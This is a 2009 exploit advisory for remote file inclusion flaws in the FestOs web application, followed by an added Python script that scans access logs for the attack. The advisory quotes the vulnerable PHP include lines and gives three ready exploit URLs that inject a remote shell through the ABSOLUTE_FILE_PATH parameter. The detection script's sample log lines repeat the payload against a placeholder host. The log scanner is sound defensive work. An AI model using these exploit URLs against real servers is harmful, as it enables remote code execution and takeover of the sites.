# Title : FestOs <= 2.2.1 Multiple RFI Exploit
# Published : 2009-12-19
# Author : cr4wl3r
##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit ##
## Date: 19-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://code.google.com/p/festos/downloads/list ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code : [reports_placement.php]
<?php
$title = "Jury Sheet Report";
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
    header("Location:index.php");
}
include "includes/reportheader.php";
?>
~ 3xplo!t :
[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [FestOS.php]
require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");
~ 3xplo!t :
[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [reportheader.php]
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
~ 3xplo!t :
[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]
and more...
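
~ Detection (added example, not part of the original advisory or of FestOS) :
The request pattern listed above can be found in web-server access logs with a short log scan. The log lines are constructed samples, and the names classify, scan and SAMPLE_LOG are hypothetical; the only value taken from the advisory is the parameter name.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "ABSOLUTE_FILE_PATH"  # parameter name from the advisory
# URL scheme/stream wrapper (two or more characters) or a UNC path as the value.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|\\\\)", re.I)
# Request target inside a common/combined-format access log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return None, 'probe' (parameter present) or 'remote-include' (URL-like value)."""
    m = REQUEST.search(line)
    if not m:
        return None
    verdict = None
    # parse_qsl percent-decodes keys and values once.
    for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if PARAM not in key.upper():  # substring match, case-insensitive
            continue
        verdict = verdict or "probe"
        # Decode a second time so double-encoded values are still inspected.
        if REMOTE.match(unquote(value)):
            verdict = "remote-include"
    return verdict

def scan(lines):
    """Return (client, verdict) for every flagged log line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample log lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Dec/2009:10:00:01 +0000] "GET /festos/admin/reports_placement.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [19/Dec/2009:10:02:13 +0000] "GET /festos/core/FestOS.php?ABSOLUTE_FILE_PATH=http://host.example.invalid/x.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Dec/2009:10:02:15 +0000] "GET /festos/admin/includes/reportheader.php?absolute_file_path=hTTp%3A%2F%2Fhost.example.invalid%2Fx HTTP/1.0" 200 87',
    '203.0.113.5 - - [19/Dec/2009:10:05:40 +0000] "GET /festos/core/FestOS.php?ABSOLUTE_FILE_PATH=test HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

Any hit is worth reviewing, since a legitimate client has no reason to send this parameter; a 'remote-include' hit answered with status 200 deserves the closest look.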